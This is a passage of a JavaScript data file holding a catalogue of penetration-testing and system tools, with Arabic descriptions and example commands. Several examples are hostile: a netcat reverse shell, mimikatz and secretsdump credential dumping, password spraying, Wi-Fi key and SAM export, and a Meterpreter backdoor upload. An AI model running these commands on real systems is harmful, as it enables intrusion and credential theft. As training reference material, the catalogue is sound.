{ id:1008, name:'pspy', cat:'system', syntax:'./pspy', short:'مراقبة العمليات بدون صلاحيات root', desc:'يراقب عمليات النظام في الوقت الفعلي بدون الحاجة لصلاحيات root.', examples:['./pspy','./pspy -p','./pspy -f'], level:'intermediate' },
{ id:1009, name:'ltrace', cat:'system', syntax:'ltrace command', short:'تتبع استدعاءات المكتبات', desc:'يتتبع استدعاءات مكتبات C في تنفيذ البرامج.', examples:['ltrace ls','ltrace -e malloc program'], level:'advanced' },
{ id:1010, name:'strace', cat:'system', syntax:'strace command', short:'تتبع استدعاءات النظام', desc:'يتتبع استدعاءات النظام والإشارات في تنفيذ البرامج.', examples:['strace ls','strace -p PID','strace -e trace=network curl google.com'], level:'advanced' },

// ==========================================
// 12. MALWARE ANALYSIS - تحليل البرمجيات الخبيثة
// ==========================================
{ id:1101, name:'file', cat:'malware', syntax:'file filename', short:'تحديد نوع الملف', desc:'يحدد نوع الملف بناءً على محتواه وليس الامتداد.', examples:['file malware.exe','file -i suspicious.doc','file *'], level:'beginner' },
{ id:1102, name:'objdump', cat:'malware', syntax:'objdump [options] binary', short:'تفريغ وتحليل الثنائيات', desc:'يحلل ويفرغ محتوى الملفات الثنائية والمكتبات.', examples:['objdump -d malware.bin','objdump -x binary','objdump -M intel -d malware.bin'], level:'advanced' },
{ id:1103, name:'readelf', cat:'malware', syntax:'readelf [options] elf_file', short:'تحليل ملفات ELF', desc:'يقرأ ويحلل ملفات ELF (Linux binaries).', examples:['readelf -a binary','readelf -S binary','readelf -d library.so'], level:'advanced' },
{ id:1104, name:'ghidra', cat:'malware', syntax:'ghidra', short:'تحليل البرمجيات العكسية', desc:'أداة هندسة عكسية متقدمة مفتوحة المصدر من NSA.', examples:['ghidra'], level:'advanced' },
{ id:1105, name:'radare2', cat:'malware', syntax:'radare2 [options] binary', short:'إطار تحليل ثنائي', desc:'إطار تحليل ثنائي متقدم مفتوح المصدر مع محلل عكسي.', examples:['radare2 malware.bin','r2 -A malware.bin','r2 -d malware.bin'], level:'advanced' },
{ id:1106, name:'gdb', cat:'malware', syntax:'gdb [options] binary', short:'مصحح الأخطاء GNU', desc:'مصحح الأخطاء القياسي في Linux. يستخدم لتحليل ومحاكاة تنفيذ البرامج.', examples:['gdb binary','gdb -p PID','gdb binary core'], level:'advanced' },
{ id:1107, name:'ltrace', cat:'malware', syntax:'ltrace binary', short:'تتبع استدعاءات المكتبات', desc:'يتتبع استدعاءات مكتبات المشتركة في تنفيذ البرنامج.', examples:['ltrace malware','ltrace -i malware'], level:'advanced' },
{ id:1108, name:'process-hacker', cat:'malware', syntax:'processhacker', short:'مراقبة العمليات المتقدمة', desc:'أداة مراقبة عمليات متقدمة للكشف عن البرمجيات الخبيثة.', examples:['processhacker'], level:'intermediate' },
{ id:1109, name:'clamav', cat:'malware', syntax:'clamscan [options] path', short:'فحص الفيروسات', desc:'يفحص الملفات والمجلدات بحثاً عن الفيروسات والبرمجيات الخبيثة.', examples:['clamscan -r /home/','clamscan --remove malware.exe','freshclam && clamscan -r /'], level:'beginner' },
{ id:1110, name:'yara', cat:'malware', syntax:'yara rule_file target', short:'اكتشاف البرمجيات الخبيثة', desc:'يستخدم قواعد YARA لتحديد وتصنيف البرمجيات الخبيثة.', examples:['yara rules.yar malware.bin','yara -r rules/ /samples/','yara -s rules.yar file'], level:'advanced' },

// ==========================================
// 13. SYSTEM ADMINISTRATION - إدارة النظام
// ==========================================
{ id:1201, name:'systemctl', cat:'system', syntax:'systemctl command service', short:'إدارة خدمات النظام', desc:'يدير خدمات systemd وحالة النظام.', examples:['systemctl start apache2','systemctl stop ssh','systemctl enable postgresql','systemctl status NetworkManager'], level:'beginner' },
{ id:1202, name:'service', cat:'system', syntax:'service name command', short:'إدارة الخدمات', desc:'بديل قديم لـ systemctl لإدارة خدمات النظام.', examples:['service apache2 start','service ssh stop','service --status-all'], level:'beginner' },
{ id:1203, name:'apt', cat:'system', syntax:'apt command package', short:'إدارة حزم Debian', desc:'أداة إدارة الحزم في Debian/Ubuntu/Kali.', examples:['apt update','apt upgrade','apt install nmap','apt remove package','apt search tool'], level:'beginner' },
{ id:1204, name:'dpkg', cat:'system', syntax:'dpkg [options] package', short:'إدارة حزم .deb', desc:'يدير حزم Debian مباشرة.', examples:['dpkg -i package.deb','dpkg -l','dpkg -r package','dpkg --purge package'], level:'beginner' },
{ id:1205, name:'journalctl', cat:'system', syntax:'journalctl [options]', short:'قراءة سجلات systemd', desc:'يقرأ ويعرض سجلات journal الخاصة بـ systemd.', examples:['journalctl -xe','journalctl -u ssh','journalctl -f','journalctl --since "1 hour ago"'], level:'intermediate' },
{ id:1206, name:'logrotate', cat:'system', syntax:'logrotate [options] config', short:'إدارة ملفات السجل', desc:'يدور ويضغط ويحذف ملفات السجل القديمة تلقائياً.', examples:['logrotate /etc/logrotate.conf','logrotate -f /etc/logrotate.d/nginx'], level:'intermediate' },
{ id:1207, name:'iptables', cat:'system', syntax:'iptables [options]', short:'جدار الحماية Linux', desc:'يدير قواعد جدار الحماية في Linux.', examples:['iptables -L','iptables -A INPUT -p tcp --dport 22 -j ACCEPT','iptables -F','iptables-save > rules.txt'], level:'intermediate' },
{ id:1208, name:'ufw', cat:'system', syntax:'ufw command', short:'جدار حماية مبسط', desc:'واجهة مبسطة لـ iptables لإدارة جدار الحماية.', examples:['ufw enable','ufw allow 22','ufw deny 80','ufw status verbose'], level:'beginner' },
{ id:1209, name:'mount', cat:'system', syntax:'mount device mountpoint', short:'تركيب الأقراص والأنظمة', desc:'يركب أنظمة الملفات ويعرض الأقراص المثبتة.', examples:['mount /dev/sdb1 /mnt','mount -t ext4 /dev/sdb1 /mnt','mount -o loop disk.iso /mnt'], level:'beginner' },
{ id:1210, name:'fdisk', cat:'system', syntax:'fdisk device', short:'إدارة أقسام القرص', desc:'يدير أقسام القرص الصلب.', examples:['fdisk -l','fdisk /dev/sdb'], level:'intermediate' },
{ id:1211, name:'lsblk', cat:'system', syntax:'lsblk', short:'عرض الأجهزة الكتلية', desc:'يعرض الأجهزة الكتلية (أقراص USB, HDD, SSD) وأقسامها.', examples:['lsblk','lsblk -f','lsblk -o NAME,SIZE,TYPE,MOUNTPOINT'], level:'beginner' },
{ id:1212, name:'cryptsetup', cat:'system', syntax:'cryptsetup command', short:'تشفير الأقراص', desc:'يدير تشفير LUKS للأقراص والأقسام.', examples:['cryptsetup luksFormat /dev/sdb1','cryptsetup luksOpen /dev/sdb1 myencrypt','cryptsetup status myencrypt'], level:'advanced' },

// ==========================================
// 14. SMB / WINDOWS - بروتوكول SMB وويندوز
// ==========================================
{ id:1301, name:'smbclient', cat:'network', syntax:'smbclient //host/share', short:'عميل SMB', desc:'يتصل بمشاركات SMB/CIFS ويتفاعل معها.', examples:['smbclient //192.168.1.1/share','smbclient -L 192.168.1.1','smbclient //target/C$ -U admin'], level:'intermediate' },
{ id:1302, name:'smbmap', cat:'network', syntax:'smbmap [options]', short:'تعداد مشاركات SMB', desc:'يعدد مشاركات SMB ويفحص الصلاحيات.', examples:['smbmap -H 192.168.1.1','smbmap -H 192.168.1.1 -u user -p password','smbmap -H target -R C$'], level:'intermediate' },
{ id:1303, name:'enum4linux', cat:'network', syntax:'enum4linux [options] IP', short:'تعداد Linux/Samba عبر SMB', desc:'يعدد معلومات Linux/Samba عبر بروتوكول SMB.', examples:['enum4linux 192.168.1.1','enum4linux -a 192.168.1.1'], level:'intermediate' },
{ id:1304, name:'rpcclient', cat:'network', syntax:'rpcclient -U user target', short:'استخدام RPC', desc:'يتصل ويستعلم خدمات RPC على Windows.', examples:['rpcclient -U "" 192.168.1.1','rpcclient -U user%pass target'], level:'intermediate' },
{ id:1305, name:'psexec', cat:'exploit', syntax:'psexec.py domain/user:pass@target', short:'تنفيذ عن بعد عبر SMB', desc:'ينفذ الأوامر عن بعد على Windows عبر SMB.', examples:['python3 psexec.py admin:pass@192.168.1.1','python3 psexec.py -hashes LMHASH:NTHASH admin@target'], level:'advanced' },
{ id:1306, name:'wmiexec', cat:'exploit', syntax:'wmiexec.py user:pass@target', short:'تنفيذ عبر WMI', desc:'ينفذ الأوامر عن بعد على Windows عبر WMI.', examples:['python3 wmiexec.py admin:pass@192.168.1.1'], level:'advanced' },
{ id:1307, name:'crackmapexec', cat:'network', syntax:'crackmapexec protocol target', short:'اختبار بروتوكولات شبكة Windows', desc:'أداة شاملة لاختبار بروتوكولات شبكة Windows (SMB, LDAP, MSSQL...).', examples:['crackmapexec smb 192.168.1.0/24','crackmapexec smb 192.168.1.1 -u admin -p password','crackmapexec smb target --sam'], level:'advanced' },
{ id:1308, name:'impacket', cat:'exploit', syntax:'python3 tool.py', short:'مجموعة أدوات بروتوكولات Windows', desc:'مكتبة Python لبروتوكولات شبكات Windows تتضمن أدوات قوية.', examples:['python3 GetUserSPNs.py domain/user:pass@dc','python3 secretsdump.py admin:pass@target','python3 smbserver.py share /tmp/'], level:'advanced' },

// ==========================================
// 15. POST EXPLOITATION - ما بعد الاختراق
// ==========================================
{ id:1401, name:'mimikatz', cat:'exploit', syntax:'mimikatz commands', short:'استخراج بيانات اعتماد Windows', desc:'أداة استخراج بيانات اعتماد Windows الأكثر شهرة. تستخرج الهاشات والكلمات الواضحة.', examples:['sekurlsa::logonpasswords','lsadump::sam','kerberos::list','lsadump::dcsync /domain:DOMAIN /user:Administrator'], level:'advanced' },
{ id:1402, name:'empire', cat:'exploit', syntax:'empire', short:'إطار Post-Exploitation', desc:'إطار عمل ما بعد الاختراق يدعم PowerShell وPython.', examples:['empire','empire --headless'], level:'advanced' },
{ id:1403, name:'covenant', cat:'exploit', syntax:'covenant', short:'إطار C2 بـ .NET', desc:'إطار عمل Command & Control بـ .NET لعمليات Red Team.', examples:['dotnet run'], level:'advanced' },
{ id:1404, name:'bloodhound', cat:'exploit', syntax:'bloodhound', short:'تحليل Active Directory', desc:'يحلل بيئات Active Directory ويكشف مسارات رفع الصلاحيات.', examples:['bloodhound','neo4j console'], level:'advanced' },
{ id:1405, name:'sharphound', cat:'exploit', syntax:'sharphound.exe', short:'جمع بيانات Active Directory', desc:'يجمع بيانات Active Directory لتحليلها بـ BloodHound.', examples:['SharpHound.exe -c all','SharpHound.exe -c DCOnly'], level:'advanced' },

// ==========================================
// 16. DOCKER & CONTAINERS - الحاويات
// ==========================================
{ id:1501, name:'docker', cat:'system', syntax:'docker command', short:'إدارة حاويات Docker', desc:'ينشئ ويدير حاويات Docker.', examples:['docker ps','docker pull kalilinux/kali-rolling','docker run -it kali /bin/bash','docker exec -it container bash'], level:'intermediate' },
{ id:1502, name:'docker-compose', cat:'system', syntax:'docker-compose command', short:'تنسيق حاويات Docker', desc:'يدير تطبيقات Docker متعددة الحاويات.', examples:['docker-compose up -d','docker-compose down','docker-compose logs'], level:'intermediate' },

// ==========================================
// 17. ENUMERATION - التعداد
// ==========================================
{ id:1601, name:'ldapsearch', cat:'network', syntax:'ldapsearch [options]', short:'استعلام LDAP', desc:'يستعلم وتعداد خوادم LDAP/Active Directory.', examples:['ldapsearch -x -H ldap://192.168.1.1 -b "dc=domain,dc=com"','ldapsearch -x -H ldap://target -b "dc=corp,dc=local" "(objectClass=user)"'], level:'intermediate' },
{ id:1602, name:'kerbrute', cat:'network', syntax:'kerbrute command domain', short:'تعداد مستخدمي Kerberos', desc:'يعدد مستخدمين Active Directory عبر Kerberos Pre-authentication.', examples:['kerbrute userenum --dc 192.168.1.1 -d domain.local users.txt','kerbrute passwordspray --dc 192.168.1.1 -d domain users.txt Password123!'], level:'advanced' },
{ id:1603, name:'snmpwalk', cat:'network', syntax:'snmpwalk [options] host', short:'استعلام SNMP', desc:'يسير عبر بيانات MIB لجمع معلومات الشبكة عبر SNMP.', examples:['snmpwalk -c public -v1 192.168.1.1','snmpwalk -c public -v2c target .1.3.6.1.2.1'], level:'intermediate' },
{ id:1604, name:'smtp-user-enum', cat:'network', syntax:'smtp-user-enum -M MODE -U users.txt -t target', short:'تعداد مستخدمي SMTP', desc:'يعدد المستخدمين على خوادم SMTP.', examples:['smtp-user-enum -M VRFY -U users.txt -t 192.168.1.1','smtp-user-enum -M RCPT -U users.txt -t target'], level:'intermediate' },
{ id:1605, name:'finger', cat:'network', syntax:'finger user@host', short:'معلومات المستخدمين', desc:'يجمع معلومات المستخدمين من خوادم تدعم بروتوكول finger.', examples:['finger user@target.com','finger @target.com'], level:'intermediate' },
{ id:1606, name:'rpcinfo', cat:'network', syntax:'rpcinfo -p host', short:'معلومات RPC', desc:'يعرض خدمات RPC المتاحة على الخادم.', examples:['rpcinfo -p 192.168.1.1','rpcinfo -t 192.168.1.1 nfs'], level:'intermediate' },
{ id:1607, name:'showmount', cat:'network', syntax:'showmount -e host', short:'تعداد NFS', desc:'يعرض المشاركات المتاحة على خوادم NFS.', examples:['showmount -e 192.168.1.1','showmount -a 192.168.1.1'], level:'intermediate' },

// ==========================================
// 18. TUNNELING & PIVOTING - الأنفاق والتحويل
// ==========================================
{ id:1701, name:'ssh tunneling', cat:'network', syntax:'ssh -L localport:host:port user@server', short:'نفق SSH محلي', desc:'ينشئ نفق SSH لإعادة توجيه المنافذ عبر اتصال مشفر.', examples:['ssh -L 8080:192.168.1.100:80 user@gateway','ssh -R 9090:localhost:9090 user@server','ssh -D 1080 user@proxy'], level:'intermediate' },
{ id:1702, name:'chisel', cat:'network', syntax:'chisel server/client', short:'نفق HTTP/TCP عبر Websocket', desc:'أداة نفق سريعة تعمل عبر HTTP مع Websocket.', examples:['chisel server -p 8080 --reverse','chisel client 10.0.0.1:8080 R:9090:127.0.0.1:9090'], level:'advanced' },
{ id:1703, name:'proxychains', cat:'network', syntax:'proxychains command', short:'توجيه الأوامر عبر وكيل', desc:'يوجه حركة مرور الأوامر عبر سلسلة من الوكلاء (proxies).', examples:['proxychains nmap -sT target','proxychains curl http://internal-server','proxychains firefox'], level:'intermediate' },
{ id:1704, name:'socat', cat:'network', syntax:'socat options', short:'تحويل منافذ متعدد', desc:'أداة قوية لإنشاء الاتصالات والأنفاق بين العناوين المختلفة.', examples:['socat TCP-LISTEN:8080,fork TCP:192.168.1.1:80','socat FILE:/dev/tty,raw,echo=0 TCP:host:port'], level:'advanced' },
{ id:1705, name:'sshuttle', cat:'network', syntax:'sshuttle -r user@server subnet', short:'VPN عبر SSH', desc:'ينشئ نفق VPN عبر SSH لتوجيه حركة الشبكة.', examples:['sshuttle -r user@server 192.168.1.0/24','sshuttle -r user@vpn 0.0.0.0/0'], level:'intermediate' },

// ==========================================
// 19. REPORTING & DOCUMENTATION - التوثيق
// ==========================================
{ id:1801, name:'dradis', cat:'system', syntax:'dradis', short:'إدارة نتائج الاختبار', desc:'منصة إدارة المعلومات لإنشاء تقارير اختبار الاختراق.', examples:['dradis','dradis start'], level:'intermediate' },
{ id:1802, name:'cherrytree', cat:'system', syntax:'cherrytree', short:'تدوين وتنظيم الملاحظات', desc:'تطبيق تدوين ملاحظات هرمي مثالي لتوثيق عمليات اختبار الاختراق.', examples:['cherrytree','cherrytree notes.ctb'], level:'beginner' },
{ id:1803, name:'pipal', cat:'password', syntax:'pipal [options] wordlist', short:'تحليل إحصائي لكلمات المرور', desc:'يحلل قوائم كلمات المرور إحصائياً ويستخرج أنماطها.', examples:['pipal wordlist.txt','pipal --top 20 passwords.txt'], level:'intermediate' },

// ==========================================
// 20. ADVANCED TOOLS - أدوات متقدمة
// ==========================================
{ id:1901, name:'metasploit-meterpreter', cat:'exploit', syntax:'meterpreter > command', short:'أوامر Meterpreter الكاملة', desc:'قائمة شاملة بأوامر Meterpreter لما بعد الاختراق.', examples:['sysinfo','getuid','getsystem','shell','download file.txt /tmp/','upload backdoor.exe C:\\Windows\\','run post/windows/gather/credentials/credential_collector'], level:'intermediate' },
{ id:1902, name:'powershell-empire', cat:'exploit', syntax:'usemodule module', short:'أوامر Empire', desc:'وحدات Empire PowerShell للعمليات المتقدمة.', examples:['usemodule credentials/mimikatz/logonpasswords','usemodule lateral_movement/invoke_psremoting'], level:'advanced' },
{ id:1903, name:'cobalt-strike', cat:'exploit', syntax:'cobalt-strike', short:'منصة Red Team المتقدمة', desc:'منصة Red Team احترافية للعمليات المتقدمة.', examples:['cobalt-strike'], level:'advanced' },
{ id:1904, name:'burp-extensions', cat:'web', syntax:'extender tab', short:'إضافات Burp Suite', desc:'أشهر إضافات Burp Suite لتحسين قدرات الفحص.', examples:['Logger++', 'ActiveScan++', 'Autorize', 'CO2', 'SQLiPy', 'J2EEScan'], level:'intermediate' },
{ id:1905, name:'nuclei', cat:'web', syntax:'nuclei -u URL -t templates/', short:'فاحص الثغرات بالقوالب', desc:'أداة فحص ثغرات سريعة تعتمد على قوالب YAML.', examples:['nuclei -u https://target.com','nuclei -l urls.txt -t templates/cves/','nuclei -u target.com -severity critical,high'], level:'intermediate' },
{ id:1906, name:'subfinder', cat:'recon', syntax:'subfinder -d domain', short:'اكتشاف نطاقات فرعية سريع', desc:'يكتشف النطاقات الفرعية بسرعة من مصادر متعددة.', examples:['subfinder -d target.com -o subs.txt','subfinder -d target.com -all'], level:'beginner' },
{ id:1907, name:'httpx', cat:'web', syntax:'httpx -l urls.txt', short:'فحص HTTP سريع', desc:'أداة فحص HTTP سريعة ومتعددة الأغراض.', examples:['cat subs.txt | httpx','httpx -l urls.txt -title -status-code','httpx -l domains.txt -screenshot'], level:'intermediate' },
{ id:1908, name:'ghauri', cat:'web', syntax:'ghauri -u URL', short:'اكتشاف SQL Injection متقدم', desc:'أداة حديثة ومتقدمة لاكتشاف واستغلال SQL Injection.', examples:['ghauri -u "http://target.com?id=1" --dbs','ghauri -u "http://target.com?id=1" -D db --tables'], level:'advanced' },

// ==========================================
// 21. EXTRA UNIQUE COMMANDS - أوامر إضافية
// ==========================================
{ id:2001, name:'iodine', cat:'pivoting', syntax:'iodine -f -P <pass> <dns> <domain>', short:'نفق IP عبر DNS', desc:'أداة لإنشاء نفق IP عبر بروتوكول DNS لتجاوز قيود الشبكة.', examples:['iodined -f -P password 10.0.0.1 tunnel.example.com','iodine -f -P password dns.example.com tunnel.example.com'], level:'advanced' },
{ id:2002, name:'dnschef', cat:'network', syntax:'dnschef [options]', short:'خادم DNS وهمي للاختبار', desc:'خادم DNS وهمي مرن يُستخدم لإعادة توجيه طلبات DNS إلى عناوين مخصصة.', examples:['dnschef --fakeip=192.168.1.1 --fakedomains=evil.com','dnschef -q --fakeip=127.0.0.1'], level:'intermediate' },
{ id:2003, name:'mitmdump', cat:'web', syntax:'mitmdump [options]', short:'تسجيل حركة HTTP عبر mitmproxy', desc:'أداة سطر الأوامر الخاصة بـ mitmproxy لتسجيل وتحليل حركة HTTP.', examples:['mitmdump -w traffic.log','mitmdump -r traffic.log','mitmdump --mode transparent'], level:'intermediate' },
{ id:2004, name:'ftp', cat:'network', syntax:'ftp [options] <host>', short:'بروتوكول نقل الملفات', desc:'عميل FTP الكلاسيكي للاتصال بخوادم FTP ونقل الملفات.', examples:['ftp 192.168.1.100','ftp -n -v target.com','ftp anonymous@target.com'], level:'beginner' },
{ id:2005, name:'telnet', cat:'network', syntax:'telnet <host> [port]', short:'الاتصال بالخدمات عبر Telnet', desc:'أداة قديمة للاتصال بالمنافذ، مفيدة لاختبار الاتصال والبانرات.', examples:['telnet 192.168.1.100 21','telnet 192.168.1.100 25','telnet target.com 80'], level:'beginner' },
{ id:2006, name:'snmp-check', cat:'network', syntax:'snmp-check [options] <host>', short:'تعداد معلومات SNMP', desc:'أداة لتعداد معلومات تفصيلية من أجهزة SNMP المتاحة.', examples:['snmp-check 192.168.1.100','snmp-check -c public 192.168.1.100','snmp-check -v 2c 192.168.1.100'], level:'intermediate' },
{ id:2007, name:'ike-scan', cat:'network', syntax:'ike-scan [options] <host>', short:'مسح وتحديد VPN IKE', desc:'يكشف ويحدد خوادم IKE (VPN) ويجمع معلومات عنها.', examples:['ike-scan 192.168.1.100','ike-scan --aggressive 192.168.1.100','ike-scan --showbackoff 192.168.1.100'], level:'intermediate' },
{ id:2008, name:'proxytunnel', cat:'pivoting', syntax:'proxytunnel [options]', short:'نفق بروتوكولات عبر HTTP Proxy', desc:'ينشئ أنفاقاً عبر HTTP proxies للوصول إلى خدمات محظورة.', examples:['proxytunnel -p proxy:8080 -d target:22 -a 2222','ssh -o ProxyCommand="proxytunnel -p proxy:8080 -d target:22" user@target'], level:'advanced' },
{ id:2009, name:'dnsspoof', cat:'network', syntax:'dnsspoof [options]', short:'تزوير استجابات DNS', desc:'يعترض ويزيف استجابات DNS لتوجيه الضحايا إلى عناوين IP مخصصة.', examples:['dnsspoof -i eth0 -f hosts.txt','dnsspoof -i eth0 "udp port 53"'], level:'intermediate' },
{ id:2010, name:'msfdb-init', cat:'exploit', syntax:'msfdb init', short:'تهيئة قاعدة بيانات Metasploit', desc:'تهيئة وإعداد قاعدة بيانات PostgreSQL لـ Metasploit Framework.', examples:['msfdb init','msfdb start','msfdb status','msfdb reinit'], level:'beginner' },
{ id:2011, name:'db_nmap', cat:'exploit', syntax:'db_nmap [options] <target>', short: 'nmap مدمج مع قاعدة بيانات Metasploit', desc:'تنفيذ nmap من داخل msfconsole مع حفظ النتائج في قاعدة البيانات.', examples:['db_nmap -sV -sC 192.168.1.100','db_nmap -A 192.168.1.0/24','hosts','services'], level:'intermediate' },
{ id:2012, name:'powerview', cat:'exploit', syntax:'Import-Module PowerView.ps1', short:'استطلاع وتعداد Active Directory بـ PowerShell', desc:'وحدة PowerShell قوية لتعداد بيئات Active Directory وإيجاد مسارات الهجوم.', examples:['Get-Domain','Get-DomainUser','Get-DomainGroup','Get-DomainComputer','Find-LocalAdminAccess','Get-DomainTrust'], level:'advanced' },
{ id:2013, name:'netsh', cat:'system', syntax:'netsh [options]', short:'إدارة شبكة Windows من سطر الأوامر', desc:'أداة Windows لإدارة الشبكة وجدار الحماية وإنشاء الأنفاق.', examples:['netsh interface show interface','netsh firewall show state','netsh wlan show profiles','netsh wlan export profile key=clear'], level:'intermediate' },
{ id:2014, name:'reg', cat:'system', syntax:'reg [command] [options]', short:'إدارة Registry ويندوز من الـ CLI', desc:'أداة Windows لقراءة وكتابة وحذف مفاتيح الـ Registry.', examples:['reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run','reg add HKCU\\Environment /v PATH /t REG_SZ /d "C:\\malware"','reg export HKLM\\SAM backup.reg'], level:'intermediate' },
{ id:2015, name:'icacls', cat:'system', syntax:'icacls <path> [options]', short:'إدارة صلاحيات ملفات Windows', desc:'يعرض ويعدّل قوائم التحكم في الوصول (ACL) على ملفات ومجلدات Windows.', examples:['icacls C:\\Windows\\System32','icacls file.txt /grant user:(F)','icacls C:\\path /inheritance:d'], level:'intermediate' },
{ id:2016, name:'accesschk', cat:'privesc', syntax:'accesschk.exe [options] <object>', short:'فحص صلاحيات Windows للرفع', desc:'أداة Sysinternals لفحص الصلاحيات على services وfiles وregistry لإيجاد رفع الصلاحيات.', examples:['accesschk.exe -ucqv *','accesschk.exe -ucqv wuauserv','accesschk.exe -dqv "C:\\Program Files"'], level:'intermediate' },
{ id:2017, name:'netcat-traditional', cat:'network', syntax:'nc.traditional [options]', short:'نسخة netcat التقليدية الكلاسيكية', desc:'النسخة الكلاسيكية من netcat المتاحة في بعض أنظمة Linux مع دعم خيار -e.', examples:['nc.traditional -e /bin/bash 10.10.10.1 4444','nc.traditional -lvp 4444'], level:'beginner' },
{ id:2018, name:'nmap-scripts', cat:'network', syntax:'nmap --script <script> <target>', short:'استخدام NSE scripts في Nmap', desc:'مجموعة شاملة من سكريبتات Nmap Scripting Engine لاكتشاف الثغرات وجمع المعلومات.', examples:['nmap --script smb-vuln-ms17-010 192.168.1.100','nmap --script http-shellshock target.com','nmap --script dns-zone-transfer target.com','nmap --script vuln -p 80,443 target.com'], level:'intermediate' },
{ id:2019, name:'shell-upgrade', cat:'exploit', syntax:'python3 -c "import pty; pty.spawn(\'/bin/bash\')"', short:'ترقية shell بسيط إلى TTY كامل', desc:'تقنيات ترقية shell محدود إلى terminal تفاعلي كامل.', examples:['python3 -c "import pty; pty.spawn(\'/bin/bash\')"','export TERM=xterm && stty raw -echo; fg','script /dev/null -c bash'], level:'intermediate' },
{ id:2020, name:'sslh', cat:'network', syntax:'sslh [options]', short:'مشاركة منفذ HTTPS/SSH', desc:'يتيح تشغيل SSH وHTTPS على نفس المنفذ (443) لتجاوز قيود الشبكة.', examples:['sslh -p 0.0.0.0:443 --ssl localhost:4443 --ssh localhost:22','sslh --transparent -p 0.0.0.0:443 --ssl localhost:4443 --ssh localhost:22'], level:'advanced' },
];

// Export
window.COMMANDS_DB = COMMANDS_DB;
console.log(`✅ Loaded ${COMMANDS_DB.length} commands`);
